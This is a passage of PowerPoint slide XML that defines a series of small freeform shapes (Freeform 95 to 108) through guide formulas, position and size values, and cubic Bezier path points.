                <a:gd name="T6" fmla="*/ 12 w 15"/>
                <a:gd name="T7" fmla="*/ 0 h 21"/>
                <a:gd name="T8" fmla="*/ 14 w 15"/>
                <a:gd name="T9" fmla="*/ 0 h 21"/>
                <a:gd name="T10" fmla="*/ 15 w 15"/>
                <a:gd name="T11" fmla="*/ 2 h 21"/>
                <a:gd name="T12" fmla="*/ 3 w 15"/>
                <a:gd name="T13" fmla="*/ 20 h 21"/>
                <a:gd name="T14" fmla="*/ 1 w 15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21"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0" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="12"/>
                    <a:pt x="8" y="6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1"/>
                    <a:pt x="15" y="2"/>
                    <a:pt x="15" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="8"/>
                    <a:pt x="6" y="14"/>
                    <a:pt x="3" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="21"/>
                    <a:pt x="2" y="21"/>
                    <a:pt x="1" y="2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6" name="Freeform 95"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4344988" y="5648326"/>
              <a:ext cx="133350" cy="179388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 18"/>
                <a:gd name="T1" fmla="*/ 24 h 24"/>
                <a:gd name="T2" fmla="*/ 1 w 18"/>
                <a:gd name="T3" fmla="*/ 24 h 24"/>
                <a:gd name="T4" fmla="*/ 1 w 18"/>
                <a:gd name="T5" fmla="*/ 22 h 24"/>
                <a:gd name="T6" fmla="*/ 16 w 18"/>
                <a:gd name="T7" fmla="*/ 0 h 24"/>
                <a:gd name="T8" fmla="*/ 18 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 18 w 18"/>
                <a:gd name="T11" fmla="*/ 3 h 24"/>
                <a:gd name="T12" fmla="*/ 3 w 18"/>
                <a:gd name="T13" fmla="*/ 23 h 24"/>
                <a:gd name="T14" fmla="*/ 2 w 18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24">
                  <a:moveTo>
                    <a:pt x="2" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="24"/>
                    <a:pt x="2" y="24"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="14"/>
                    <a:pt x="9" y="7"/>
                    <a:pt x="16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8" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="18" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="8"/>
                    <a:pt x="7" y="15"/>
                    <a:pt x="3" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="23"/>
                    <a:pt x="3" y="24"/>
                    <a:pt x="2" y="24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7" name="Freeform 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4389438" y="5729288"/>
              <a:ext cx="96838" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 13"/>
                <a:gd name="T1" fmla="*/ 17 h 17"/>
                <a:gd name="T2" fmla="*/ 1 w 13"/>
                <a:gd name="T3" fmla="*/ 17 h 17"/>
                <a:gd name="T4" fmla="*/ 1 w 13"/>
                <a:gd name="T5" fmla="*/ 15 h 17"/>
                <a:gd name="T6" fmla="*/ 8 w 13"/>
                <a:gd name="T7" fmla="*/ 3 h 17"/>
                <a:gd name="T8" fmla="*/ 12 w 13"/>
                <a:gd name="T9" fmla="*/ 0 h 17"/>
                <a:gd name="T10" fmla="*/ 13 w 13"/>
                <a:gd name="T11" fmla="*/ 2 h 17"/>
                <a:gd name="T12" fmla="*/ 11 w 13"/>
                <a:gd name="T13" fmla="*/ 3 h 17"/>
                <a:gd name="T14" fmla="*/ 10 w 13"/>
                <a:gd name="T15" fmla="*/ 4 h 17"/>
                <a:gd name="T16" fmla="*/ 4 w 13"/>
                <a:gd name="T17" fmla="*/ 15 h 17"/>
                <a:gd name="T18" fmla="*/ 4 w 13"/>
                <a:gd name="T19" fmla="*/ 16 h 17"/>
                <a:gd name="T20" fmla="*/ 3 w 13"/>
                <a:gd name="T21" fmla="*/ 17 h 17"/>
                <a:gd name="T22" fmla="*/ 2 w 13"/>
                <a:gd name="T2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7">
                  <a:moveTo>
                    <a:pt x="2" y="17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0" y="16"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="1" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="11"/>
                    <a:pt x="6" y="7"/>
                    <a:pt x="8" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="12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2" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="3"/>
                    <a:pt x="11" y="3"/>
                    <a:pt x="10" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="8"/>
                    <a:pt x="7" y="12"/>
                    <a:pt x="4" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="15"/>
                    <a:pt x="4" y="16"/>
                    <a:pt x="4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" y="17"/>
                    <a:pt x="2" y="17"/>
                    <a:pt x="2" y="17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8" name="Freeform 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="4487863"/>
              <a:ext cx="141288" cy="193675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 19"/>
                <a:gd name="T1" fmla="*/ 26 h 26"/>
                <a:gd name="T2" fmla="*/ 0 w 19"/>
                <a:gd name="T3" fmla="*/ 26 h 26"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 24 h 26"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 1 h 26"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 26"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 2 h 26"/>
                <a:gd name="T12" fmla="*/ 3 w 19"/>
                <a:gd name="T13" fmla="*/ 25 h 26"/>
                <a:gd name="T14" fmla="*/ 1 w 19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6">
                  <a:moveTo>
                    <a:pt x="1" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="26"/>
                    <a:pt x="1" y="26"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="24"/>
                    <a:pt x="0" y="24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8" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="2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6"/>
                    <a:pt x="2" y="26"/>
                    <a:pt x="1" y="26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9" name="Freeform 98"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4778375" y="4673601"/>
              <a:ext cx="133350" cy="150813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 18"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 0 w 18"/>
                <a:gd name="T3" fmla="*/ 20 h 20"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 18 h 20"/>
                <a:gd name="T6" fmla="*/ 12 w 18"/>
                <a:gd name="T7" fmla="*/ 2 h 20"/>
                <a:gd name="T8" fmla="*/ 17 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 17 w 18"/>
                <a:gd name="T11" fmla="*/ 2 h 20"/>
                <a:gd name="T12" fmla="*/ 15 w 18"/>
                <a:gd name="T13" fmla="*/ 3 h 20"/>
                <a:gd name="T14" fmla="*/ 14 w 18"/>
                <a:gd name="T15" fmla="*/ 4 h 20"/>
                <a:gd name="T16" fmla="*/ 3 w 18"/>
                <a:gd name="T17" fmla="*/ 19 h 20"/>
                <a:gd name="T18" fmla="*/ 1 w 18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0">
                  <a:moveTo>
                    <a:pt x="1" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="18"/>
                    <a:pt x="0" y="18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4" y="0"/>
                    <a:pt x="16" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="17" y="2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5" y="3"/>
                    <a:pt x="15" y="3"/>
                    <a:pt x="14" y="4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20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="2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Freeform 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="4786313"/>
              <a:ext cx="141288" cy="231775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 31 h 31"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 31 h 31"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 29 h 31"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 0 h 31"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 31"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 2 h 31"/>
                <a:gd name="T12" fmla="*/ 3 w 19"/>
                <a:gd name="T13" fmla="*/ 30 h 31"/>
                <a:gd name="T14" fmla="*/ 2 w 19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1">
                  <a:moveTo>
                    <a:pt x="2" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="31"/>
                    <a:pt x="1" y="31"/>
                    <a:pt x="1" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="0" y="30"/>
                    <a:pt x="0" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="19"/>
                    <a:pt x="10" y="9"/>
                    <a:pt x="16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1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="18" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="11"/>
                    <a:pt x="7" y="20"/>
                    <a:pt x="3" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="31"/>
                    <a:pt x="2" y="31"/>
                    <a:pt x="2" y="3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Freeform 100"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="4899026"/>
              <a:ext cx="149225" cy="223838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 20"/>
                <a:gd name="T1" fmla="*/ 30 h 30"/>
                <a:gd name="T2" fmla="*/ 0 w 20"/>
                <a:gd name="T3" fmla="*/ 30 h 30"/>
                <a:gd name="T4" fmla="*/ 0 w 20"/>
                <a:gd name="T5" fmla="*/ 28 h 30"/>
                <a:gd name="T6" fmla="*/ 17 w 20"/>
                <a:gd name="T7" fmla="*/ 1 h 30"/>
                <a:gd name="T8" fmla="*/ 19 w 20"/>
                <a:gd name="T9" fmla="*/ 1 h 30"/>
                <a:gd name="T10" fmla="*/ 20 w 20"/>
                <a:gd name="T11" fmla="*/ 3 h 30"/>
                <a:gd name="T12" fmla="*/ 5 w 20"/>
                <a:gd name="T13" fmla="*/ 27 h 30"/>
                <a:gd name="T14" fmla="*/ 5 w 20"/>
                <a:gd name="T15" fmla="*/ 27 h 30"/>
                <a:gd name="T16" fmla="*/ 4 w 20"/>
                <a:gd name="T17" fmla="*/ 29 h 30"/>
                <a:gd name="T18" fmla="*/ 2 w 20"/>
                <a:gd name="T19" fmla="*/ 30 h 30"/>
                <a:gd name="T20" fmla="*/ 2 w 20"/>
                <a:gd name="T2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30">
                  <a:moveTo>
                    <a:pt x="2" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="30"/>
                    <a:pt x="1" y="30"/>
                    <a:pt x="0" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="29"/>
                    <a:pt x="0" y="29"/>
                    <a:pt x="0" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="12" y="10"/>
                    <a:pt x="17" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="18" y="0"/>
                    <a:pt x="19" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1"/>
                    <a:pt x="20" y="2"/>
                    <a:pt x="20" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="11"/>
                    <a:pt x="10" y="19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8"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="4" y="2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Freeform 101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4762500" y="5056188"/>
              <a:ext cx="142875" cy="201613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 19"/>
                <a:gd name="T1" fmla="*/ 27 h 27"/>
                <a:gd name="T2" fmla="*/ 2 w 19"/>
                <a:gd name="T3" fmla="*/ 26 h 27"/>
                <a:gd name="T4" fmla="*/ 1 w 19"/>
                <a:gd name="T5" fmla="*/ 23 h 27"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 1 h 27"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 27"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 3 h 27"/>
                <a:gd name="T12" fmla="*/ 4 w 19"/>
                <a:gd name="T13" fmla="*/ 24 h 27"/>
                <a:gd name="T14" fmla="*/ 4 w 19"/>
                <a:gd name="T15" fmla="*/ 26 h 27"/>
                <a:gd name="T16" fmla="*/ 3 w 19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7">
                  <a:moveTo>
                    <a:pt x="3" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="27"/>
                    <a:pt x="2" y="26"/>
                    <a:pt x="2" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="26"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="15"/>
                    <a:pt x="11" y="8"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="18" y="0"/>
                    <a:pt x="18" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="10"/>
                    <a:pt x="8" y="17"/>
                    <a:pt x="4" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="25"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="4" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="26"/>
                    <a:pt x="3" y="27"/>
                    <a:pt x="3" y="27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3" name="Freeform 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="5183188"/>
              <a:ext cx="157163" cy="201613"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 21"/>
                <a:gd name="T1" fmla="*/ 27 h 27"/>
                <a:gd name="T2" fmla="*/ 1 w 21"/>
                <a:gd name="T3" fmla="*/ 26 h 27"/>
                <a:gd name="T4" fmla="*/ 1 w 21"/>
                <a:gd name="T5" fmla="*/ 24 h 27"/>
                <a:gd name="T6" fmla="*/ 18 w 21"/>
                <a:gd name="T7" fmla="*/ 1 h 27"/>
                <a:gd name="T8" fmla="*/ 20 w 21"/>
                <a:gd name="T9" fmla="*/ 1 h 27"/>
                <a:gd name="T10" fmla="*/ 21 w 21"/>
                <a:gd name="T11" fmla="*/ 3 h 27"/>
                <a:gd name="T12" fmla="*/ 4 w 21"/>
                <a:gd name="T13" fmla="*/ 25 h 27"/>
                <a:gd name="T14" fmla="*/ 4 w 21"/>
                <a:gd name="T15" fmla="*/ 25 h 27"/>
                <a:gd name="T16" fmla="*/ 3 w 21"/>
                <a:gd name="T17" fmla="*/ 27 h 27"/>
                <a:gd name="T18" fmla="*/ 2 w 21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7">
                  <a:moveTo>
                    <a:pt x="2" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="27"/>
                    <a:pt x="1" y="27"/>
                    <a:pt x="1" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="26"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="16"/>
                    <a:pt x="12" y="8"/>
                    <a:pt x="18" y="1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1" y="2"/>
                    <a:pt x="21" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="10"/>
                    <a:pt x="9" y="17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6"/>
                    <a:pt x="3" y="26"/>
                    <a:pt x="3" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="27"/>
                    <a:pt x="2" y="27"/>
                    <a:pt x="2" y="27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4" name="Freeform 103"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4756150" y="5310188"/>
              <a:ext cx="141288" cy="187325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 25 h 25"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 25 h 25"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 23 h 25"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 1 h 25"/>
                <a:gd name="T8" fmla="*/ 19 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 25"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 2 h 25"/>
                <a:gd name="T12" fmla="*/ 5 w 19"/>
                <a:gd name="T13" fmla="*/ 21 h 25"/>
                <a:gd name="T14" fmla="*/ 5 w 19"/>
                <a:gd name="T15" fmla="*/ 22 h 25"/>
                <a:gd name="T16" fmla="*/ 3 w 19"/>
                <a:gd name="T17" fmla="*/ 24 h 25"/>
                <a:gd name="T18" fmla="*/ 2 w 1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25">
                  <a:moveTo>
                    <a:pt x="2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0" y="24"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="0" y="2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8" y="0"/>
                    <a:pt x="19" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="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5"/>
                    <a:pt x="2" y="25"/>
                    <a:pt x="2" y="25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5" name="Freeform 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="5414963"/>
              <a:ext cx="127000" cy="173038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 17"/>
                <a:gd name="T1" fmla="*/ 23 h 23"/>
                <a:gd name="T2" fmla="*/ 1 w 17"/>
                <a:gd name="T3" fmla="*/ 23 h 23"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 21 h 23"/>
                <a:gd name="T6" fmla="*/ 15 w 17"/>
                <a:gd name="T7" fmla="*/ 1 h 23"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 0 h 23"/>
                <a:gd name="T10" fmla="*/ 17 w 17"/>
                <a:gd name="T11" fmla="*/ 2 h 23"/>
                <a:gd name="T12" fmla="*/ 3 w 17"/>
                <a:gd name="T13" fmla="*/ 22 h 23"/>
                <a:gd name="T14" fmla="*/ 2 w 17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3">
                  <a:moveTo>
                    <a:pt x="2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0" y="22"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="2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7" y="1"/>
                    <a:pt x="17" y="2"/>
                    <a:pt x="17" y="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3"/>
                    <a:pt x="2" y="23"/>
                    <a:pt x="2" y="23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6" name="Freeform 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4778375" y="5505451"/>
              <a:ext cx="133350" cy="165100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 18"/>
                <a:gd name="T1" fmla="*/ 22 h 22"/>
                <a:gd name="T2" fmla="*/ 1 w 18"/>
                <a:gd name="T3" fmla="*/ 21 h 22"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 19 h 22"/>
                <a:gd name="T6" fmla="*/ 15 w 18"/>
                <a:gd name="T7" fmla="*/ 0 h 22"/>
                <a:gd name="T8" fmla="*/ 17 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 22"/>
                <a:gd name="T10" fmla="*/ 18 w 18"/>
                <a:gd name="T11" fmla="*/ 2 h 22"/>
                <a:gd name="T12" fmla="*/ 3 w 18"/>
                <a:gd name="T13" fmla="*/ 21 h 22"/>
                <a:gd name="T14" fmla="*/ 1 w 18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22">
                  <a:moveTo>
                    <a:pt x="1" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="22"/>
                    <a:pt x="1" y="22"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="13"/>
                    <a:pt x="10" y="6"/>
                    <a:pt x="15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8" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="18" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="8"/>
                    <a:pt x="7" y="15"/>
                    <a:pt x="3" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="22"/>
                    <a:pt x="2" y="22"/>
                    <a:pt x="1" y="22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7" name="Freeform 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4778375" y="5580063"/>
              <a:ext cx="141288" cy="165100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 22 h 22"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 22 h 22"/>
                <a:gd name="T4" fmla="*/ 1 w 19"/>
                <a:gd name="T5" fmla="*/ 20 h 22"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 0 h 22"/>
                <a:gd name="T8" fmla="*/ 18 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 22"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 2 h 22"/>
                <a:gd name="T12" fmla="*/ 3 w 19"/>
                <a:gd name="T13" fmla="*/ 22 h 22"/>
                <a:gd name="T14" fmla="*/ 2 w 19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2">
                  <a:moveTo>
                    <a:pt x="2" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="22"/>
                    <a:pt x="1" y="22"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="22"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="1" y="2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8" y="1"/>
                    <a:pt x="19" y="1"/>
                    <a:pt x="18" y="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2" y="22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8" name="Freeform 107"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4770438" y="5676901"/>
              <a:ext cx="141288" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 19"/>
                <a:gd name="T1" fmla="*/ 27 h 27"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 27 h 27"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 25 h 27"/>
                <a:gd name="T6" fmla="*/ 1 w 19"/>
                <a:gd name="T7" fmla="*/ 23 h 27"/>
                <a:gd name="T8" fmla="*/ 16 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 27"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 1 h 27"/>
                <a:gd name="T12" fmla="*/ 19 w 19"/>
                <a:gd name="T13" fmla="*/ 3 h 27"/>
                <a:gd name="T14" fmla="*/ 3 w 19"/>
                <a:gd name="T15" fmla="*/ 26 h 27"/>
                <a:gd name="T16" fmla="*/ 1 w 19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7">
                  <a:moveTo>
                    <a:pt x="1" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="27"/>
                    <a:pt x="1" y="27"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="0" y="26"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24"/>
                    <a:pt x="0" y="24"/>
                    <a:pt x="1" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="15"/>
                    <a:pt x="10" y="8"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="18" y="0"/>
                    <a:pt x="19" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="10"/>
                    <a:pt x="7" y="18"/>
                    <a:pt x="3" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="26"/>
                    <a:pt x="2" y="27"/>
                    <a:pt x="1" y="27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9" name="Freeform 108"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5189538" y="5018088"/>
              <a:ext cx="141288" cy="173038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 19"/>
                <a:gd name="T1" fmla="*/ 23 h 23"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 23 h 23"/>
                <a:gd name="T4" fmla="*/ 1 w 19"/>
                <a:gd name="T5" fmla="*/ 21 h 23"/>
                <a:gd name="T6" fmla="*/ 16 w 19"/>
                <a:gd name="T7" fmla="*/ 0 h 23"/>
                <a:gd name="T8" fmla="*/ 19 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 23"/>
